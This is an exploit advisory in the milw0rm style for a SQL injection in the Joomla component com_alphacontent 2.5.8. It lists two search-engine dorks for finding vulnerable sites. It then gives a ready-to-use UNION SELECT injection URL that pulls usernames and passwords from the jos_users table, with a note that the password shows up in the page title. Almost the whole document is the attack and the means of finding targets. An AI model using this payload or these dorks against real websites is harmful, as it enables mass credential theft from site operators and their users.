##########################################
#
# [ Joomla Component com_alphacontent SQL Injection ]
#
##########################################
[~] Vulnerability found by: cO2 [ Algeria Security Crew ]
[~] Contact: c02[at]hotmail.de
[~] Website: http://www.dzw0rm.ch
[~] Greetings: to all hackers DZ
##########################################
[~] ScriptName : 'Joomla'
[~] ModuleName : 'AlphaContent'
[~] Version() : '2.5.8 '
###########################################
#
# DORK 1 : inurl: "com_alphacontent"
#
# DORK 2 : "AlphaContent 2.5.8 © 2005-2008 - visualclinic.fr"
#
###########################################
[+]Exploit :
index.php?option=com_alphacontent§ion=6&cat=15&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),39/**/from/**/jos_users/*
###########################################
[+] : you can see the password in 'Title'
###########################################
side note:
<name>alphacontent</name>
<creationDate>25 Jul 2007</creationDate>
<author>Bernard Gilly</author>
<copyright>This component is released under the GNU/GPL License.</copyright>
<authorEmail>contact@visualclinic.fr</authorEmail>
<authorUrl>www.visualclinic.fr</authorUrl>
<version>2.5.8</version>
<description>Directory component with alphabetical indexes for Joomla's Content</description>
<name>alphacontent</name>
<creationDate>16 Sept 2006</creationDate>
<author>Bernard Gilly</author>
<copyright>This component is released under the GNU/GPL License.</copyright>
<authorEmail>contact@visualclinic.fr</authorEmail>
<authorUrl>www.visualclinic.fr</authorUrl>
<version>2.5.4</version>
<description>Directory component and alphabetical indexes for Mambo/Joomla's Content</description>
# milw0rm.com [2008-03-25]